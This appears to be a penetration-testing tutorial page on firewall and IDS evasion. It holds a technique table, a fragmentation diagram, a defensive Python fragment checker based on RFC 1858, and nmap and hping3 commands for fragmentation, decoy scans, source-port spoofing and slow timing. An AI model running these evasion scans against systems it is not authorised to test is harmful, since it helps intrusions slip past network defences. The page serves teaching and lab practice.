Firewall Evasion
TL;DR: Firewalls filter based on ports, flags, and states. Evasion techniques exploit parsing differences.
Evasion Techniques
| Technique | How It Works | Use |
|---|---|---|
| Fragment | Split packet across fragments | Bypass pattern matching |
| TTL manipulation | Packets reach target but not IDS | IDS in path |
| Bad checksum | Some systems ignore | Evade inspection |
| Unusual flags | FIN without connection | Bypass stateful FW |
| Source port | Use trusted ports (53, 80) | Bypass port filtering |
| Decoy | Multiple source IPs | Hide attacker IP |
Fragmentation
```text
Normal Packet:
┌───────────┬────────────┬──────────────┐
│ IP Header │ TCP Header │     Data     │
└───────────┴────────────┴──────────────┘

Fragmented:
┌─────┬─────────────┐  ┌─────┬─────────────┐  ┌─────┬─────────────┐
│ IP  │ Part of TCP │  │ IP  │ Rest of TCP │  │ IP  │    Data     │
│     │ Header      │  │     │ Header+Flags│  │     │             │
└─────┴─────────────┘  └─────┴─────────────┘  └─────┴─────────────┘
     Fragment 1             Fragment 2             Fragment 3
```
The firewall sees an incomplete TCP header in Fragment 1 and may not be able to apply its TCP rules to it.
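The defensive counterpart to the diagram above is a fragment check in the filter itself. The function below is an added example written for this guide (not code from the original post): it parses the IPv4 header, and for TCP fragments applies the two RFC 1858 rules, drop a first fragment too short to hold the 20-byte TCP header, and drop a fragment whose offset (8 bytes, FO=1) would land inside the flags field of the first fragment; everything else is held for reassembly before TCP rules are applied. The header builder and all packets are constructed for the example, with checksums left at zero.

```python
# Added example (not from the original post): classify IPv4 fragments so an
# incomplete TCP header in Fragment 1 is not passed through unexamined.
# Implements the RFC 1858 tiny-fragment and FO=1 rules; packets are constructed.
import struct

TCP_HEADER_MIN = 20   # bytes needed to see ports, seq, ack and flags
FLAGS_END = 14        # byte offset just past the TCP flags field

def parse_ipv4(pkt):
    """Return (proto, header_len, more_fragments, fragment_offset_bytes, payload)."""
    ver_ihl, _tos, total_len, _ident, flags_frag, _ttl, proto, _csum = \
        struct.unpack("!BBHHHBBH", pkt[:12])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    more = bool(flags_frag & 0x2000)          # MF flag
    offset = (flags_frag & 0x1FFF) * 8        # fragment offset is in 8-byte units
    return proto, ihl, more, offset, pkt[ihl:total_len]

def fragment_verdict(pkt):
    """Decide what a filter should do with this packet before applying TCP rules."""
    proto, _ihl, more, offset, payload = parse_ipv4(pkt)
    if proto != 6:
        return "not-tcp"
    if offset == 0 and not more:
        return "unfragmented"                          # whole TCP header present
    if offset == 0 and len(payload) < TCP_HEADER_MIN:
        return "drop: tiny first fragment"             # flags cannot be inspected
    if 0 < offset < FLAGS_END:
        return "drop: fragment overlaps TCP flags"     # FO=1 rewrite of bytes 8-15
    if offset == 0:
        return "hold: first fragment, TCP header complete"
    return "hold: non-first fragment"

def ipv4(proto, more, offset_bytes, payload):
    """Build a constructed 20-byte IPv4 header (checksum zero) plus payload."""
    flags_frag = (0x2000 if more else 0) | (offset_bytes // 8)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 1, flags_frag,
                      64, proto, 0, bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]))
    return hdr + payload

# Constructed fragments: payload bytes stand in for TCP header/data content.
TINY_FIRST = ipv4(6, True, 0, b"\x00" * 8)     # only ports + part of seq in fragment 1
OVERLAP = ipv4(6, True, 8, b"\x00" * 16)       # FO=1: would overwrite bytes 8-23
FULL_FIRST = ipv4(6, True, 0, b"\x00" * 24)    # full TCP header, more to come
TAIL = ipv4(6, False, 24, b"\x00" * 32)        # last fragment, data only
WHOLE = ipv4(6, False, 0, b"\x00" * 40)        # ordinary unfragmented segment
UDP_FRAG = ipv4(17, True, 0, b"\x00" * 4)      # not TCP, outside this check

if __name__ == "__main__":
    for name, p in [("TINY_FIRST", TINY_FIRST), ("OVERLAP", OVERLAP), ("FULL_FIRST", FULL_FIRST),
                    ("TAIL", TAIL), ("WHOLE", WHOLE), ("UDP_FRAG", UDP_FRAG)]:
        print(name, "->", fragment_verdict(p))
```

Holding rather than forwarding the non-first fragments is what makes the `nmap -f` and `hping3 -f` cases above inspectable: the TCP rules run once on the reassembled header, not on each piece.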
Evasion Commands
```bash
# === nmap Evasion ===
# Fragment packets
nmap -f target.com
# MTU (Maximum Transmission Unit)
nmap --mtu 24 target.com
# Decoy scan
nmap -D RND:10 target.com
nmap -D decoy1,decoy2,ME target.com
# Source port manipulation
nmap --source-port 53 target.com
nmap -g 53 target.com
# Randomize host order
nmap --randomize-hosts 192.168.1.0/24
# Timing (slow down)
nmap -T0 target.com   # Paranoid
nmap -T1 target.com   # Sneaky
# Bad checksum (testing)
nmap --badsum target.com

# === hping3 Evasion ===
# Fragment
hping3 -S -f -p 80 target.com
# TTL manipulation
hping3 -S -t 5 -p 80 target.com
# Spoof source port
hping3 -S -s 53 -p 80 target.com
```
Packet Crafting
| Tool | Purpose | Install |
|---|---|---|
| hping3 | TCP/IP packet crafting | `apt install hping3` |
| Scapy | Python packet manipulation | `pip install scapy` |
| nping | nmap's packet generator | `apt install nmap` |
| nemesis | Command-line packet craft | `apt install nemesis` |
Packet Analysis
| Tool | Purpose | Install |
|---|---|---|
| Wireshark | GUI packet analyzer | `apt install wireshark` |
| tcpdump | CLI packet capture | `apt install tcpdump` |
| tshark | Wireshark CLI | `apt install tshark` |
| NetworkMiner | Forensic analyzer | Download |
Connection Tools
| Tool | Purpose | Install |
|---|---|---|
| netcat (nc) | TCP/UDP connections | `apt install netcat` |
| ncat | Improved netcat | `apt install nmap` |
| socat | Advanced relay | `apt install socat` |
Practice Labs
Beginner
| Resource | Focus |
|---|---|
| TryHackMe - Network Fundamentals | TCP basics |
| HackTheBox Academy | Packet analysis |
| Wireshark tutorial | Tool usage |

| Resource | Focus |
|---|---|
| PentesterLab | TCP attacks |
| CTF challenges | Packet forensics |
| Home lab | Attack simulation |
Home Lab Setup
```bash
# Set up packet capture environment
# 1. Install tools
apt install wireshark tcpdump nmap hping3 netcat

# 2. Create test environment with two VMs
#    VM1: Target (open services)
#    VM2: Attacker

# 3. Practice exercises:
#    - Capture three-way handshake
#    - Identify scan types in captures
#    - Perform SYN scan and capture
#    - Analyze retransmissions

# Sample capture exercise:
# Terminal 1: Start capture
tcpdump -i eth0 -w capture.pcap tcp port 80
# Terminal 2: Generate traffic
curl http://target.com
# Terminal 3: Analyze
wireshark capture.pcap
```
Glossary
| Term | Definition |
|---|---|
| ACK | Acknowledgment flag |
| Checksum | Error detection value |
| FIN | Finish flag (close connection) |
| Handshake | Connection establishment |
| ISN | Initial Sequence Number |
| MSS | Maximum Segment Size |
| PSH | Push flag (immediate delivery) |
| RST | Reset flag (abort) |
| RTT | Round Trip Time |
| Segment | TCP data unit |
| SEQ | Sequence number |
| SYN | Synchronize flag (initiate) |
| SYN-ACK | SYN + ACK (accept connection) |
| TTL | Time To Live |
| URG | Urgent flag |
| Window | Flow control buffer size |
What’s Next?
Now that you understand TCP/IP:
| Topic | Description | Link |
|---|---|---|
| ARP & Layer 2 | Link layer attacks | Coming Soon |
| Network Fundamentals | Broader networking | Network Fundamentals |
| DNS Deep Dive | Application layer | DNS Guide |
| Wireshark Mastery | Deep packet analysis | Practice Labs |
Summary
TCP/IP knowledge is fundamental for penetration testing:
- TCP Header - Ports, sequence numbers, flags, window
- Three-Way Handshake - SYN → SYN-ACK → ACK
- Flags - SYN, ACK, FIN, RST, PSH, URG
- Attacks - SYN flood, RST injection, session hijacking
- Scanning - SYN, Connect, FIN, NULL, XMAS, ACK
- Analysis - Wireshark, tcpdump, identifying anomalies
- Evasion - Fragmentation, timing, source port, decoys
Key Skills:
- Read and understand packet captures
- Identify open ports using different scan types
- Recognize attack patterns in traffic
- Craft custom packets for testing
Found this guide helpful? Check out the other posts in the SecureKhan penetration testing series.